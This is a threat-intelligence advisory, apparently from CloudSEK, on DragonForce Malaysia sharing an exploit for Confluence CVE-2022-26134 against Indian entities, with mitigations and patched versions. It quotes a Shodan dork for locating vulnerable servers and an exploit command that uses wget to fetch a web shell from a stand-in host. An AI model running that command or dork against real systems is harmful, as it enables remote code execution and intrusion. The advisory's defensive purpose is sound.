Hacktivist Group DragonForce Actively Targeting Indian Entities, Shares an Exploit for a Critical Confluence Server Vulnerability CVE-2022-26134

Originally published at: https://cloudsek.com/threatintelligence/hacktivist-group-dragonforce-actively-targeting-indian-entities-shares-an-exploit-for-a-critical-confluence-server-vulnerability-cve-2022-26134/

 

Category:

Adversary Intelligence

Threat Type:
Latest Attack
Motivation:

Hacktivist

Region:

India

Source*:

D4

Executive Summary

THREAT IMPACT MITIGATION
  • DragonForce Malaysia, the hacktivist group actively involved in targeting Indian entities, announced and shared the exploit CVE-2022-26134 which is a Confluence Server vulnerability.
  • The group has also shared a list of dorks targeting the Indian region on their Telegram channel.
  • Actors can scan the internet for vulnerable instances of Confluence servers and leverage this vulnerability to launch attacks against significant Indian entities owned by both the government and private sectors.
  • Look for patches and workarounds for the CVE-2022-26134.
  • Audit and monitor anomalies in networks that could be indicators of possible compromise.

CloudSEK’s contextual AI digital risk platform XVigil identified a post on a Telegram channel where the hacktivist group, DragonForce Malaysia has shared an exploit to CVE-2022-26134 to actively target and exploit Indian entities. CVE-2022-26134 is a critical unauthenticated remote code execution vulnerability present in Confluence Server and Data Center.

DragonForce posting updates on their Telegram channel

Analysis and Attribution

Information from Cybercrime Forums

  • On 21 June 2022, a threat actor published a post on a cybercrime forum, mentioning a PoC (Proof of Concept) for the exploit along with the Shodan dork for Confluence Server vulnerabilities targeted towards the Indian region.

Shodan Dork: http.favicon.hash:-305179312 country:”IN”

  • The actor also shared a GitHub repository containing the script which can be downloaded and exploited using the following python command:
CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php
  • Later that day, DragonForce Malaysia was seen sharing this exploit to all of their 152,257 subscribers on their Telegram channel.
  • A significant amount of chatter was also observed on multiple cybercrime forums and Telegram channels regarding this Confluence vulnerability.
Cybercrime forum post discussing CVE-2022-26134

 

About DragonForce

  • On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by a Malaysian hacktivist group going by the name DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
  • The group’s primary objective of the attack, as claimed by them, was to get back at the Indian Government for controversial comments on Prophet Muhammad by some Indian politicians.
  • The group behind this cyber call to arms, DragonForce Malaysia, is a pro-Palestinian hacktivist group based in Malaysia.
  • This group owns and operates a forum where they post announcements and discuss their latest activities.
  • The group also has Instagram and Facebook pages along with multiple Telegram channels. However, most content is replicated across their website and social media handles.
  • The group has been conducting regular recruitment and promotion campaigns using Tiktok and Instagram reels.

DragonForce’s Official Communication Channels

Forum : https//dragonforce[.]io
Radio : https//radio[.]dragonforce[.]io
Facebook : https//fb[.]me/dragonforcedotio
Telegram : https//t[.]me/dragonforceio
Twitter : https//twitter[.]com/dragonforceio
Instagram : https//instagram[.]com/dragonforceio
YouTube : https//www.youtube[.]com/channel/UC9GycRXuy7-WMULPBkBp4Bw

Information from OSINT

  • Based on the information from the open web, CloudSEK researchers could identify that as of 4 June 2022 at least 23 unique IPs were exploiting this vulnerability.
  • A Shodan search showed that there are at least 9,396 publicly reachable instances of Confluence on the internet.
Source: ShodanSource: Shodan

 

  • The data from Cloudflare indicates that this vulnerability is being exploited by multiple sources on a large scale.
Graph depicting the exploitation of CVE-2022-26134 (Source: Cloudflare)

 

Impact & Mitigation

Impact Mitigation
  • DragonForce is associated with multiple hacktivist groups for their campaign against Indian entities. This exploit gives them more opportunities to deface and dump the database of Indian entities.
  • Attackers can use this vulnerability to execute commands remotely.
  • Threat actors can leverage this opportunity to target victims and deploy ransomware.
  • Potential loss of revenue, reputation, and intellectual property.
  • The Confluence Server and Data Center versions need to be updated to the following patched versions:
    • 7.4.17
    • 7.13.7
    • 7.14.3
    • 7.15.2
    • 7.16.4
    • 7.17.4
    • 7.18.1
  • Audit and monitor anomalies in networks that could be indicators of possible compromise.

References